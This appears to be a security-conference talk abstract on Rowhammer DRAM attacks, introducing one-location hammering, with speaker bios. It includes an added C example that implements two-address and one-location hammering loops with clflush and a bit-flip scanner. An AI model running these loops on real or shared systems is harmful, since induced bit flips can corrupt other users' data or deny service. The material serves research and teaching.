The Rowhammer bug affects most DRAM modules: software can induce bit flips in DRAM cells and thereby corrupt data it has no permission to write. Although DRAM vendors treated it merely as a reliability issue, research has shown that a single bit flip can subvert the security of an entire computer system.
In the introduction to the talk, we outline the developments around Rowhammer since its presentation at Black Hat USA 2015 and discuss the attacks and defenses that researchers have proposed since. Defenses against Rowhammer either try to prevent the Rowhammer effect entirely or, failing that, ensure that an attack can no longer exploit the resulting bit flips.
We present a novel Rowhammer attack that undermines all existing assumptions on the requirements for such attacks. With one-location hammering, we show that Rowhammer does not necessarily require alternating accesses to two or more addresses. We explain how memory-controller policies in modern CPUs enable an attacker to use this new hammering technique. Moreover, we introduce new building blocks for exploiting Rowhammer-like bit flips that circumvent all currently proposed countermeasures. In addition to classical privilege-escalation attacks, we also demonstrate a new, easily mountable denial-of-service attack that can be exploited in the cloud.
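To make the difference between the two access patterns concrete, the following is an added example (not the speakers' code and not from the talk): a classic two-address hammering loop beside a one-location loop that repeatedly accesses and flushes a single address, plus a scanner that counts flipped bits in a buffer afterwards. It assumes an x86 CPU (for `clflush`; on other architectures the flush is a no-op and the loop only exercises the cache), and it makes no claim that a given machine will actually produce flips. The sample row contents in `sample_row` are constructed for the scanner check.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Evict the cache line so the next access goes to DRAM. x86-only; elsewhere a
 * no-op so the file still compiles (assumption: the reader runs this on x86). */
#if defined(__x86_64__) || defined(__i386__)
static inline void flush_line(const volatile void *p) {
    __asm__ volatile("clflush (%0)" : : "r"(p) : "memory");
}
#else
static inline void flush_line(const volatile void *p) { (void)p; }
#endif

/* Classic hammering: alternate between two addresses so the DRAM row buffer
 * is repeatedly opened and closed. Returns the sum of bytes read, which keeps
 * the loop observable and is easy to check (rounds * 2 * value). */
uint64_t hammer_two_locations(const volatile uint8_t *a,
                              const volatile uint8_t *b, uint64_t rounds) {
    uint64_t sink = 0;
    for (uint64_t i = 0; i < rounds; i++) {
        sink += *a;
        sink += *b;
        flush_line(a);
        flush_line(b);
    }
    return sink;
}

/* One-location hammering: only one address is accessed and flushed. The row
 * toggling is left to the memory controller's page policy (e.g. a closed-page
 * policy that closes the row after each access), not to a second address.
 * Returns rounds * value. */
uint64_t hammer_one_location(const volatile uint8_t *a, uint64_t rounds) {
    uint64_t sink = 0;
    for (uint64_t i = 0; i < rounds; i++) {
        sink += *a;
        flush_line(a);
    }
    return sink;
}

/* Count bit positions where buf differs from the fill byte it was written with. */
size_t count_bit_flips(const uint8_t *buf, size_t len, uint8_t expected) {
    size_t flips = 0;
    for (size_t i = 0; i < len; i++) {
        uint8_t diff = buf[i] ^ expected;
        while (diff) {
            flips += diff & 1u;
            diff >>= 1;
        }
    }
    return flips;
}

/* Constructed sample: a row filled with 0xFF in which two bytes were "flipped"
 * (one bit in byte 2, all eight bits in byte 5), for checking the scanner. */
const uint8_t sample_row[8] = {0xFF, 0xFF, 0xFE, 0xFF, 0xFF, 0x00, 0xFF, 0xFF};

int main(void) {
    /* 2 MiB of memory, filled with a known pattern, hammered at one address,
     * then scanned. Parameters (size, offset, rounds) are arbitrary choices. */
    size_t len = 2u * 1024u * 1024u;
    uint8_t *buf = malloc(len);
    if (!buf) return 1;
    memset(buf, 0xFF, len);
    const volatile uint8_t *target = buf + 4096u * 100u;
    hammer_one_location(target, 2000000u);
    printf("bit flips observed after one-location hammering: %zu\n",
           count_bit_flips(buf, len, 0xFF));
    printf("scanner self-check on constructed row: %zu flipped bits\n",
           count_bit_flips(sample_row, sizeof sample_row, 0xFF));
    free(buf);
    return 0;
}
```

Whether the one-location loop produces flips depends on the memory controller's page policy and on the module, which is exactly the dependency the talk describes; the two-location loop is the pattern earlier defenses were designed around.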
We also show that, despite all these efforts, the Rowhammer bug is still not prevented. We conclude that more research is required to fully understand the bug before efficient and secure countermeasures can be designed.
Michael Schwarz is an Infosec PhD student at Graz University of Technology with a focus on microarchitectural side-channel attacks and system security. He holds two master's degrees, one in computer science and one in software development with a strong focus on security. He frequently participates in CTFs and has also been a finalist in the European Cyber Security Challenge. He was a speaker at Black Hat Europe 2016 and Black Hat Asia 2017 where he presented his research on microarchitectural side-channel attacks. He authored and co-authored several papers published at international academic conferences and journals, including USENIX Security 2016, NDSS 2017, and NDSS 2018.
Daniel Gruss (@lavados) is a PostDoc at Graz University of Technology. He finished his PhD with distinction in less than three years. He has been involved in teaching undergraduate courses since 2010. Daniel's research focuses on software-based side-channel attacks that exploit timing differences in hardware and operating systems. He implemented the first remote fault attack running in a website, known as Rowhammer.js. He has spoken at top international venues, including Black Hat USA 2016, USENIX Security 2015 and 2016, ACM CCS 2016, the Chaos Communication Congress 2015, and many more. His research team was one of the four teams that found the Meltdown and Spectre bugs published in early 2018.
Moritz Lipp is a researcher in information security at Graz University of Technology. He is pursuing his PhD at the Institute of Applied Information Processing and Communications with a strong focus on microarchitectural side-channel attacks on personal computers and mobile devices. His research has been published at top academic conferences and presented at venues around the world.